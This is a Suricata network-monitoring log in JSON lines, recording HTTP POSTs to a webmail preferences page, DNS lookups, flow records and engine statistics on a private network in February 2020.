{"timestamp":"2020-02-29T00:25:33.933068+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:33.951123+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:34.000675+0000","flow_id":1239998652620537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34284,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":30,"pkts_toclient":63,"bytes_toserver":3393,"bytes_toclient":80771,"start":"2020-02-29T00:24:22.597753+0000","end":"2020-02-29T00:24:27.642179+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:25:38.000187+0000","event_type":"stats","stats":{"uptime":15190,"capture":{"kernel_packets":141593,"kernel_drops":0},"decoder":{"pkts":141609,"bytes":97258964,"invalid":195,"ipv4":140022,"ipv6":10,"ethernet":141609,"raw":0,"null":0,"sll":0,"tcp":134446,"udp":5366,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2907,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2923,"synack":2914,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1915,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2454,"failed_udp":116},"tx":{"http":4974,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2538}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2536,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10896,"memcap_state":0,"memcap_global":0},"http":{"memuse":57324,"memcap":0}}} 
{"timestamp":"2020-02-29T00:25:38.952006+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53140,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.452593+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:39.560672+0000","flow_id":35694122887153,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36372,"proto":"UDP","dns":{"type":"answer","id":2574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:39.686533+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:39.701713+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:40.001334+0000","flow_id":473329795826713,"event_type":"flow","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:39.164889+0000","end":"2020-02-29T00:20:39.276286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:42.000607+0000","flow_id":1649433575501601,"event_type":"flow","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:41.470817+0000","end":"2020-02-29T00:20:41.579975+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:25:42.000814+0000","flow_id":1825376910826116,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:20:41.449156+0000","end":"2020-02-29T00:20:41.556671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:44.702897+0000","flow_id":681193347724086,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53146,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} 
{"timestamp":"2020-02-29T00:25:45.000180+0000","event_type":"stats","stats":{"uptime":15197,"capture":{"kernel_packets":141617,"kernel_drops":0},"decoder":{"pkts":141630,"bytes":97266988,"invalid":195,"ipv4":140041,"ipv6":10,"ethernet":141630,"raw":0,"null":0,"sll":0,"tcp":134463,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2539,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10565,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} 
{"timestamp":"2020-02-29T00:25:48.000875+0000","flow_id":193285043724562,"event_type":"flow","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:47.794898+0000","end":"2020-02-29T00:20:47.903724+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:49.000616+0000","flow_id":934914226655249,"event_type":"flow","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:48.266257+0000","end":"2020-02-29T00:20:48.377643+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:52.000234+0000","event_type":"stats","stats":{"uptime":15204,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app
_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2874,"new_pruned":17,"est_pruned":2541,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9903,"memcap_state":0,"memcap_global":0},"http":{"memuse":1440,"memcap":0}}} {"timestamp":"2020-02-29T00:25:54.000228+0000","flow_id":25411967806218,"event_type":"flow","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":39,"pkts_toclient":40,"bytes_toserver":3793,"bytes_toclient":50594,"start":"2020-02-29T00:24:48.420618+0000","end":"2020-02-29T00:24:53.581992+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000411+0000","flow_id":1027445017833512,"event_type":"flow","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-29T00:24:48.421928+0000","end":"2020-02-29T00:24:53.434933+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:25:54.000480+0000","flow_id":2058924363639521,"event_type":"flow","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1768,"bytes_toclient":4862,"start":"2020-02-29T00:24:48.420577+0000","end":"2020-02-29T00:24:53.435236+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000543+0000","flow_id":2226118850538449,"event_type":"flow","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":2976,"start":"2020-02-29T00:24:48.420817+0000","end":"2020-02-29T00:24:53.435205+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:54.000636+0000","flow_id":404301097748814,"event_type":"flow","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1678,"bytes_toclient":13190,"start":"2020-02-29T00:24:48.280910+0000","end":"2020-02-29T00:24:53.435437+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:25:54.000693+0000","flow_id":1391374776691898,"event_type":"flow","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":813,"bytes_toclient":1857,"start":"2020-02-29T00:24:48.421050+0000","end":"2020-02-29T00:24:53.434966+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:56.000823+0000","flow_id":1792692210569469,"event_type":"flow","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:55.135421+0000","end":"2020-02-29T00:20:55.246785+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:25:59.000150+0000","event_type":"stats","stats":{"uptime":15211,"capture":{"kernel_packets":141630,"kernel_drops":0},"decoder":{"pkts":141633,"bytes":97267186,"invalid":195,"ipv4":140044,"ipv6":10,"ethernet":141633,"raw":0,"null":0,"sll":0,"tcp":134466,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2908,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2924,"synack":2915,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2880,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:03.000231+0000","flow_id":574029615970907,"event_type":"flow","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":17,"bytes_toserver":4066,"bytes_toclient":14425,"start":"2020-02-29T00:24:57.178779+0000","end":"2020-02-29T00:25:02.400737+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000608+0000","flow_id":327567212657976,"event_type":"flow","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1796,"bytes_toclient":3211,"start":"2020-02-29T00:24:57.179512+0000","end":"2020-02-29T00:25:02.203210+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.000787+0000","flow_id":105264000271271,"event_type":"flow","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":20,"bytes_toserver":3073,"bytes_toclient":17407,"start":"2020-02-29T00:24:56.197543+0000","end":"2020-02-29T00:25:02.207159+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:26:03.000947+0000","flow_id":1255271558660282,"event_type":"flow","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":2418,"bytes_toclient":6796,"start":"2020-02-29T00:24:57.180410+0000","end":"2020-02-29T00:25:02.203347+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:03.001092+0000","flow_id":1124614358556355,"event_type":"flow","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":6,"bytes_toserver":825,"bytes_toclient":3037,"start":"2020-02-29T00:24:57.188099+0000","end":"2020-02-29T00:25:02.196186+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:26:06.000214+0000","event_type":"stats","stats":{"uptime":15218,"capture":{"kernel_packets":141634,"kernel_drops":0},"decoder":{"pkts":141724,"bytes":97351162,"invalid":195,"ipv4":140135,"ipv6":10,"ethernet":141724,"raw":0,"null":0,"sll":0,"tcp":134557,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10005,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":0,"flows_removed":5,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:13.000168+0000","event_type":"stats","stats":{"uptime":15225,"capture":{"kernel_packets":141728,"kernel_drops":0},"decoder":{"pkts":141732,"bytes":97351680,"invalid":195,"ipv4":140141,"ipv6":10,"ethernet":141732,"raw":0,"null":0,"sll":0,"tcp":134563,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:13.000748+0000","flow_id":291270444040479,"event_type":"flow","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":46,"pkts_toclient":48,"bytes_toserver":11808,"bytes_toclient":42234,"start":"2020-02-29T00:24:57.180511+0000","end":"2020-02-29T00:25:12.186174+0000","age":15,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:13.000894+0000","flow_id":1751078273571388,"event_type":"flow","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:12.088636+0000","end":"2020-02-29T00:21:12.197781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:13.001057+0000","flow_id":503484763396705,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:21:12.449121+0000","end":"2020-02-29T00:21:12.451002+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:14.850575+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14644,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
